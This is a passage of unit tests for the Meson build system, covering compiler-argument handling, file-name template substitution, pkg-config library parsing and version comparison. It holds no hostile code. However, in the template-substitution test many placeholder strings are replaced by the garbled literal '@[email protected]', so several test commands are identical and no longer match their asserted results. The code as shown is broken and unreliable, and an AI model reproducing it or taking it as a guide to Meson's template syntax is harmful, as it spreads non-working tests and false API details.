self.assertEqual(modefunc('rwxr-xr-x'),
stat.S_IRWXU |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
self.assertEqual(modefunc('rw-r--r--'),
stat.S_IRUSR | stat.S_IWUSR |
stat.S_IRGRP |
stat.S_IROTH)
self.assertEqual(modefunc('rwsr-x---'),
stat.S_IRWXU | stat.S_ISUID |
stat.S_IRGRP | stat.S_IXGRP)
def test_compiler_args_class(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
# Test that empty initialization works
a = cargsfunc(cc)
self.assertEqual(a, [])
# Test that list initialization works
a = cargsfunc(cc, ['-I.', '-I..'])
self.assertEqual(a, ['-I.', '-I..'])
# Test that there is no de-dup on initialization
self.assertEqual(cargsfunc(cc, ['-I.', '-I.']), ['-I.', '-I.'])
## Test that appending works
a.append('-I..')
self.assertEqual(a, ['-I..', '-I.'])
a.append('-O3')
self.assertEqual(a, ['-I..', '-I.', '-O3'])
## Test that in-place addition works
a += ['-O2', '-O2']
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
# Test that removal works
a.remove('-O2')
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
# Test that de-dup happens on addition
a += ['-Ifoo', '-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# .extend() is just +=, so we don't test it
## Test that addition works
# Test that adding a list with just one old arg works and yields the same array
a = a + ['-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# Test that adding a list with one arg new and one old works
a = a + ['-Ifoo', '-Ibaz']
self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
# Test that adding args that must be prepended and appended works
a = a + ['-Ibar', '-Wall']
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
## Test that reflected addition works
# Test that adding to a list with just one old arg works and yields the same array
a = ['-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
# Test that adding to a list with just one new arg that is not pre-pended works
a = ['-Werror'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with two new args preserves the order
a = ['-Ldir', '-Lbah'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with old args does nothing
a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
## Test that adding libraries works
l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Adding a library and a libpath appends both correctly
l += ['-Lbardir', '-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
# Adding the same library again does nothing
l += ['-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
## Test that 'direct' append and extend works
l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
def test_compiler_args_class_gnuld(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = cargsfunc(gcc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding a non-library argument doesn't include it in the group
l += ['-Lfoo', '-Wl,--export-dynamic']
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
# -Wl,-ldl is detected as a library and gets added to the group
l.append('-Wl,-ldl')
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = cargsfunc(gcc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
## Test that to_native removes all system includes
l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
def test_string_templates_substitution(self):
dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
substfunc = mesonbuild.mesonlib.substitute_values
ME = mesonbuild.mesonlib.MesonException
# Identity
self.assertEqual(dictfunc([], []), {})
# One input, no outputs
inputs = ['bar/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@[email protected]', '@[email protected]', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
cmd = ['@INPUT@', '@[email protected]', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
# One input, one output
inputs = ['bar/foo.c.in']
outputs = ['out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@[email protected]', '@OUTPUT@', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + outputs + cmd[2:])
cmd = ['@[email protected]', '@[email protected]', '@OUTPUT0@']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
cmd = ['@INPUT@', '@[email protected]', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
# One input, one output with a subdir
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Two inputs, no outputs
inputs = ['bar/foo.c.in', 'baz/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@[email protected]', '@[email protected]', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
cmd = ['@INPUT0@', '@INPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Too many inputs
cmd = ['@PLAINNAME@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@BASENAME@']
self.assertRaises(ME, substfunc, cmd, d)
# No outputs
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTPUT0@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTDIR@']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, one output
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
cmd = ['@[email protected]', '@[email protected]', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, two outputs
outputs = ['dir/out.c', 'dir/out2.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
'@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
cmd = ['@[email protected]', '@[email protected]', '@OUTDIR@']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
# Many inputs, can't use @INPUT@ like this
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Many outputs, can't use @OUTPUT@ like this
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
def test_needs_exe_wrapper_override(self):
config = ConfigParser()
config['binaries'] = {
'c': '\'/usr/bin/gcc\'',
}
config['host_machine'] = {
'system': '\'linux\'',
'cpu_family': '\'arm\'',
'cpu': '\'armv7\'',
'endian': '\'little\'',
}
# Can not be used as context manager because we need to
# open it a second time and this is not possible on
# Windows.
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.flush()
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
detected_value = env.need_exe_wrapper()
os.unlink(configfilename)
desired_value = not detected_value
config['properties'] = {
'needs_exe_wrapper': 'true' if desired_value else 'false'
}
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
forced_value = env.need_exe_wrapper()
os.unlink(configfilename)
self.assertEqual(forced_value, desired_value)
def test_listify(self):
listify = mesonbuild.mesonlib.listify
# Test sanity
self.assertEqual([1], listify(1))
self.assertEqual([], listify([]))
self.assertEqual([1], listify([1]))
# Test flattening
self.assertEqual([1, 2, 3], listify([1, [2, 3]]))
self.assertEqual([1, 2, 3], listify([1, [2, [3]]]))
self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False))
# Test flattening and unholdering
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
self.assertEqual([holder1], listify(holder1))
self.assertEqual([holder1], listify([holder1]))
self.assertEqual([holder1, 2], listify([holder1, 2]))
self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]]))
def test_unholder(self):
unholder = mesonbuild.mesonlib.unholder
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
holders = [holder1, holder3]
self.assertEqual(1, unholder(holder1))
self.assertEqual([1], unholder([holder1]))
self.assertEqual([1, 3], unholder(holders))
def test_extract_as_list(self):
extract = mesonbuild.mesonlib.extract_as_list
# Test sanity
kwargs = {'sources': [1, 2, 3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
self.assertEqual(kwargs, {'sources': [1, 2, 3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True))
self.assertEqual(kwargs, {})
# Test unholding
holder3 = ObjectHolder(3)
kwargs = {'sources': [1, 2, holder3]}
self.assertEqual(kwargs, {'sources': [1, 2, holder3]})
# flatten nested lists
kwargs = {'sources': [1, [2, [3]]]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
def test_pkgconfig_module(self):
class Mock:
pass
dummystate = Mock()
dummystate.subproject = 'dummy'
mock = Mock()
mock.pcdep = Mock()
mock.pcdep.name = "some_name"
mock.version_reqs = []
# pkgconfig dependency as lib
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_libs([mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
# pkgconfig dependency as requires
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_reqs([mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
shr = patterns[platform]['shared']
stc = patterns[platform]['static']
shrstc = shr + tuple([x for x in stc if x not in shr])
stcshr = stc + tuple([x for x in shr if x not in stc])
p = cc.get_library_naming(env, LibType.SHARED)
self.assertEqual(p, shr)
p = cc.get_library_naming(env, LibType.STATIC)
self.assertEqual(p, stc)
p = cc.get_library_naming(env, LibType.PREFER_STATIC)
self.assertEqual(p, stcshr)
p = cc.get_library_naming(env, LibType.PREFER_SHARED)
self.assertEqual(p, shrstc)
# Test find library by mocking up openbsd
if platform != 'openbsd':
return
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
f.write('')
found = cc.find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
def test_find_library_patterns(self):
'''
Unit test for the library search patterns used by find_library()
'''
unix_static = ('lib{}.a', '{}.a')
msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
# This is the priority list of pattern matching for library searching
patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
'static': unix_static},
'linux': {'shared': ('lib{}.so', '{}.so'),
'static': unix_static},
'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
'static': unix_static},
'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
'lib{}.dll.a', '{}.dll', '{}.dll.a'),
'static': ('cyg{}.a',) + unix_static},
'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
'static': msvc_static},
'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
'{}.dll.a', '{}.lib', '{}.dll'),
'static': msvc_static}}
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if is_osx():
self._test_all_naming(cc, env, patterns, 'darwin')
elif is_cygwin():
self._test_all_naming(cc, env, patterns, 'cygwin')
elif is_windows():
if cc.get_argument_syntax() == 'msvc':
self._test_all_naming(cc, env, patterns, 'windows-msvc')
else:
self._test_all_naming(cc, env, patterns, 'windows-mingw')
elif is_openbsd():
self._test_all_naming(cc, env, patterns, 'openbsd')
else:
self._test_all_naming(cc, env, patterns, 'linux')
env.machines.host.system = 'openbsd'
self._test_all_naming(cc, env, patterns, 'openbsd')
env.machines.host.system = 'darwin'
self._test_all_naming(cc, env, patterns, 'darwin')
env.machines.host.system = 'cygwin'
self._test_all_naming(cc, env, patterns, 'cygwin')
env.machines.host.system = 'windows'
self._test_all_naming(cc, env, patterns, 'windows-mingw')
@skipIfNoPkgconfig
def test_pkgconfig_parse_libs(self):
'''
Unit test for parsing of pkg-config output to search for libraries
https://github.com/mesonbuild/meson/issues/3951
'''
def create_static_lib(name):
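# Create a dummy static library. On macOS an empty file is presumably not
# accepted as a valid archive by the toolchain, so build a real one
# containing a single trivial object instead.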
if not is_osx():
name.open('w').close()
return
src = name.with_suffix('.c')
out = name.with_suffix('.o')
with src.open('w') as f:
f.write('int meson_foobar (void) { return 0; }')
subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
subprocess.check_call(['ar', 'csr', str(name), str(out)])
with tempfile.TemporaryDirectory() as tmpdir:
pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
env = get_fake_env()
compiler = env.detect_c_compiler(MachineChoice.HOST)
env.coredata.compilers.host = {'c': compiler}
env.coredata.compiler_options.host['c']['link_args'] = FakeCompilerOptions()
p1 = Path(tmpdir) / '1'
p2 = Path(tmpdir) / '2'
p1.mkdir()
p2.mkdir()
# libfoo.a is in one prefix
create_static_lib(p1 / 'libfoo.a')
# libbar.a is in both prefixes
create_static_lib(p1 / 'libbar.a')
create_static_lib(p2 / 'libbar.a')
# Ensure that we never statically link to these
create_static_lib(p1 / 'libpthread.a')
create_static_lib(p1 / 'libm.a')
create_static_lib(p1 / 'libc.a')
create_static_lib(p1 / 'libdl.a')
create_static_lib(p1 / 'librt.a')
def fake_call_pkgbin(self, args, env=None):
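# Stand-in for PkgConfigDependency._call_pkgbin: fake the `--libs` output
# of three imaginary packages so the test can exercise library resolution
# without any real .pc files on the system.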
if '--libs' not in args:
return 0, '', ''
if args[0] == 'foo':
return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), ''
if args[0] == 'bar':
return 0, '-L{} -lbar'.format(p2.as_posix()), ''
if args[0] == 'internal':
return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), ''
old_call = PkgConfigDependency._call_pkgbin
old_check = PkgConfigDependency.check_pkgconfig
PkgConfigDependency._call_pkgbin = fake_call_pkgbin
PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
# Test begins
try:
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('foo', env, kwargs)
self.assertEqual(foo_dep.get_link_args(),
[(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
bar_dep = PkgConfigDependency('bar', env, kwargs)
self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
internal_dep = PkgConfigDependency('internal', env, kwargs)
if compiler.get_argument_syntax() == 'msvc':
self.assertEqual(internal_dep.get_link_args(), [])
else:
link_args = internal_dep.get_link_args()
for link_arg in link_args:
for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args)
finally:
# Test ends
PkgConfigDependency._call_pkgbin = old_call
PkgConfigDependency.check_pkgconfig = old_check
# Reset dependency class to ensure that in-process configure doesn't mess up
PkgConfigDependency.pkgbin_cache = {}
PkgConfigDependency.class_pkgbin = PerMachine(None, None)
def test_version_compare(self):
comparefunc = mesonbuild.mesonlib.version_compare_many
for (a, b, result) in [
('0.99.beta19', '>= 0.99.beta14', True),
]:
self.assertEqual(comparefunc(a, b)[0], result)
for (a, b, op) in [
# examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
("1.0010", "1.9", operator.gt),
("1.05", "1.5", operator.eq),
("1.0", "1", operator.gt),
("2.50", "2.5", operator.gt),
("fc4", "fc.4", operator.eq),
("FC5", "fc4", operator.lt),
("2a", "2.0", operator.lt),
("1.0", "1.fc4", operator.gt),
("3.0.0_fc", "3.0.0.fc", operator.eq),
# from RPM tests
("1.0", "1.0", operator.eq),
("1.0", "2.0", operator.lt),
("2.0", "1.0", operator.gt),
("2.0.1", "2.0.1", operator.eq),
("2.0", "2.0.1", operator.lt),
("2.0.1", "2.0", operator.gt),
("2.0.1a", "2.0.1a", operator.eq),
("2.0.1a", "2.0.1", operator.gt),
("2.0.1", "2.0.1a", operator.lt),
("5.5p1", "5.5p1", operator.eq),
("5.5p1", "5.5p2", operator.lt),
("5.5p2", "5.5p1", operator.gt),
("5.5p10", "5.5p10", operator.eq),
("5.5p1", "5.5p10", operator.lt),
("5.5p10", "5.5p1", operator.gt),
("10xyz", "10.1xyz", operator.lt),
("10.1xyz", "10xyz", operator.gt),
("xyz10", "xyz10", operator.eq),
("xyz10", "xyz10.1", operator.lt),
("xyz10.1", "xyz10", operator.gt),
("xyz.4", "xyz.4", operator.eq),
("xyz.4", "8", operator.lt),
("8", "xyz.4", operator.gt),
("xyz.4", "2", operator.lt),
("2", "xyz.4", operator.gt),
("5.5p2", "5.6p1", operator.lt),
("5.6p1", "5.5p2", operator.gt),
("5.6p1", "6.5p1", operator.lt),
("6.5p1", "5.6p1", operator.gt),
("6.0.rc1", "6.0", operator.gt),
("6.0", "6.0.rc1", operator.lt),
("10b2", "10a1", operator.gt),
("10a2", "10b2", operator.lt),
("1.0aa", "1.0aa", operator.eq),
("1.0a", "1.0aa", operator.lt),
("1.0aa", "1.0a", operator.gt),
("10.0001", "10.0001", operator.eq),
("10.0001", "10.1", operator.eq),
("10.1", "10.0001", operator.eq),
("10.0001", "10.0039", operator.lt),
("10.0039", "10.0001", operator.gt),
("4.999.9", "5.0", operator.lt),
("5.0", "4.999.9", operator.gt),
("20101121", "20101121", operator.eq),
("20101121", "20101122", operator.lt),
("20101122", "20101121", operator.gt),
("2_0", "2_0", operator.eq),
("2.0", "2_0", operator.eq),
("2_0", "2.0", operator.eq),
("a", "a", operator.eq),
("a+", "a+", operator.eq),
("a+", "a_", operator.eq),
("a_", "a+", operator.eq),
("+a", "+a", operator.eq),
("+a", "_a", operator.eq),
("_a", "+a", operator.eq),
("+_", "+_", operator.eq),
("_+", "+_", operator.eq),
("_+", "_+", operator.eq),
("+", "_", operator.eq),
("_", "+", operator.eq),
# other tests
('0.99.beta19', '0.99.beta14', operator.gt),
("1.0.0", "2.0.0", operator.lt),
(".0.0", "2.0.0", operator.lt),
("alpha", "beta", operator.lt),
("1.0", "1.0.0", operator.lt),
("2.456", "2.1000", operator.lt),
("2.1000", "3.111", operator.lt),
("2.001", "2.1", operator.eq),
("2.34", "2.34", operator.eq),
("6.1.2", "6.3.8", operator.lt),
("1.7.3.0", "2.0.0", operator.lt),
("2.24.51", "2.25", operator.lt),
("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
("3.4.1", "3.4b1", operator.gt),
("041206", "200090325", operator.lt),
("0.6.2+git20130413", "0.6.2", operator.gt),
("2.6.0+bzr6602", "2.6.0", operator.gt),
("2.6.0", "2.6b2", operator.gt),
("2.6.0+bzr6602", "2.6b2x", operator.gt),
("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
("15.8b", "15.8.0.1", operator.lt),
("1.2rc1", "1.2.0", operator.lt),
]:
ver_a = Version(a)
ver_b = Version(b)
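# Besides the stated operator, check the comparisons it implies:
# eq implies ge/le; lt implies le/ne and excludes gt/ge/eq;
# gt implies ge/ne and excludes lt/le/eq.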
if op is operator.eq:
for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.lt:
for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.gt:
for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
def test_msvc_toolset_version(self):
'''
Ensure that the toolset version returns the correct value for this MSVC
'''
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
toolset_ver = cc.get_toolset_version()
self.assertIsNotNone(toolset_ver)
# Visual Studio 2015 and older versions do not define VCToolsVersion
# TODO: ICL doesn't set this in the VS2015 profile either
if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
return
if 'VCToolsVersion' in os.environ:
vctools_ver = os.environ['VCToolsVersion']
else:
self.assertIn('VCINSTALLDIR', os.environ)
# See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
self.assertTrue(vctools_ver.startswith(toolset_ver),
msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver))
def test_split_args(self):
split_args = mesonbuild.mesonlib.split_args
join_args = mesonbuild.mesonlib.join_args
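# split_args follows the native command-line splitting rules of the current
# platform (MSVC-style parsing on Windows, POSIX shell rules elsewhere);
# join_args is its inverse where round-tripping is possible.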
if is_windows():
test_data = [
# examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
